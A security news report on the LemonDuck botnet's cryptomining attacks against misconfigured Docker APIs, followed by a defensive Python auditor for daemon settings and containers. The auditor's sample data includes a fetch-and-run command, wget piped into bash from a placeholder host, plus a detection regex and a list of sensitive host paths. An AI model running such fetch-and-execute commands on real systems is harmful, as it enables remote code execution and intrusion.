An infamous cryptocurrency-mining botnet has begun targeting misconfigured Docker APIs, according to CrowdStrike.
LemonDuck has previously been observed exploiting the ProxyLogon vulnerabilities in Microsoft Exchange Server and using EternalBlue and other exploits to mine cryptocurrency, escalate privileges and move laterally inside compromised networks.
Now its attention has turned to one of the world’s most popular containerization platforms.
The botnet is focusing on exposed Docker APIs to gain initial access, CrowdStrike explained.
“It runs a malicious container on an exposed Docker API by using a custom Docker Entrypoint to download a ‘core.png’ image file that is disguised as a Bash script,” it said in a blog post yesterday.
Before the payload, an “a.asp” file, is downloaded and mining can begin, it performs several steps, including killing the processes, IOC file paths and C&C connections of competing crypto-mining groups.
The a.asp file is also able to turn off Alibaba’s cloud monitoring service in order to fly under the radar of network defenders.
LemonDuck attempts to move laterally by searching the filesystem for SSH keys, using them to log into additional servers and run its malicious scripts.
The researchers also found multiple campaigns running from many of the C&C servers associated with LemonDuck, including ones targeting Windows and Linux systems.
“Due to the cryptocurrency boom in recent years, combined with cloud and container adoption in enterprises, cryptomining has proven to be a financially attractive option for attackers,” CrowdStrike concluded.
“Since cloud and container ecosystems heavily use Linux, it drew the attention of the operators of botnets like LemonDuck, which began targeting Docker for cryptomining on the Linux platform.”
The campaign highlights the need for administrators to ensure their container environments are properly configured according to industry best practices, ideally with cloud workload protection and detection and response tools installed.
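The two misconfigurations the article turns on are an unauthenticated Docker API listener and a container whose custom Entrypoint pulls a file and feeds it to a shell. The script below is an added example for defenders, not CrowdStrike's code and not part of the article: it audits a `daemon.json` (the real dockerd configuration format, with the weak `hosts` setting beside the TLS-hardened one) and a set of `docker inspect`-style container records, flagging download-to-shell entrypoints, privileged containers and mounts of sensitive host paths such as SSH key directories. All inputs are constructed, the container names and the `example.invalid` URL are placeholders, and the `audit_*` functions are this example's own.

```python
"""Defensive audit of a Docker daemon configuration and container records.

Added example (not CrowdStrike's code, not part of the article). Inputs are
constructed: a daemon.json in dockerd's real format and records shaped like
`docker inspect` output. Names and URLs below are illustrative placeholders.
"""
import json
import re
from typing import Any

# Constructed daemon.json with the weak setting behind the initial-access path
# in the article: the API is bound to a TCP port with no TLS, so anyone who can
# reach it can start containers on the host.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# The same file hardened: the TCP listener stays, but clients must present a
# certificate signed by the configured CA (tlsverify).
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed docker-inspect-style records. The first mimics the article's
# pattern: a custom Entrypoint fetches a file named like an image (core.png)
# and pipes it into bash, and the host's SSH directory is mounted in.
SAMPLE_CONTAINERS = [
    {
        "Name": "/suspicious",
        "Config": {
            "Image": "alpine",
            "Entrypoint": ["sh", "-c", "wget -qO- http://example.invalid/core.png | bash"],
            "Cmd": None,
        },
        "HostConfig": {"Privileged": False, "Binds": ["/root/.ssh:/mnt/ssh:ro"]},
    },
    {
        "Name": "/web",
        "Config": {"Image": "nginx:1.25", "Entrypoint": ["nginx", "-g", "daemon off;"], "Cmd": None},
        "HostConfig": {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    },
]

# A curl/wget download piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da)?sh\b")
# Host paths that should not be mounted into an untrusted container.
SENSITIVE_HOST_PATHS = ("/", "/root", "/root/.ssh", "/home", "/var/run/docker.sock", "/etc")


def audit_daemon_config(raw_json: str) -> list[str]:
    """Return findings for a daemon.json: any tcp:// listener without tlsverify."""
    cfg = json.loads(raw_json)
    findings = []
    for host in cfg.get("hosts", []):
        if host.startswith("tcp://") and not cfg.get("tlsverify", False):
            findings.append(f"API listener {host} accepts unauthenticated requests (no tlsverify)")
    return findings


def _argv(value: Any) -> str:
    """Flatten an Entrypoint/Cmd value (list, string or None) into one string."""
    if value is None:
        return ""
    if isinstance(value, list):
        return " ".join(value)
    return str(value)


def audit_container(record: dict) -> list[str]:
    """Return findings for one docker-inspect-style record."""
    findings = []
    name = record.get("Name", "?")
    cfg = record.get("Config", {})
    hc = record.get("HostConfig", {})
    launch = _argv(cfg.get("Entrypoint")) + " " + _argv(cfg.get("Cmd"))
    if PIPE_TO_SHELL.search(launch):
        findings.append(f"{name}: entrypoint/cmd pipes a download into a shell")
    if hc.get("Privileged"):
        findings.append(f"{name}: runs privileged")
    for bind in hc.get("Binds") or []:
        host_path = bind.split(":", 1)[0]  # Binds are "host:container[:opts]"
        if host_path in SENSITIVE_HOST_PATHS or host_path.startswith("/root/.ssh"):
            findings.append(f"{name}: mounts sensitive host path {host_path}")
    return findings


def audit_all(daemon_json: str, containers: list[dict]) -> list[str]:
    """Combine daemon and per-container findings into one list."""
    out = audit_daemon_config(daemon_json)
    for record in containers:
        out.extend(audit_container(record))
    return out


if __name__ == "__main__":
    for line in audit_all(WEAK_DAEMON_JSON, SAMPLE_CONTAINERS):
        print("FINDING:", line)
    print("hardened daemon findings:", audit_daemon_config(HARDENED_DAEMON_JSON))
```

On a real host the same functions can be fed `/etc/docker/daemon.json` and the output of `docker inspect $(docker ps -q)`; the daemon check is the one that matters most here, since a `tcp://` listener without `tlsverify` is exactly the exposure the article describes, and the container checks are a second line that catches what an attacker launches through it.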
Some parts of this article are sourced from:
www.infosecurity-journal.com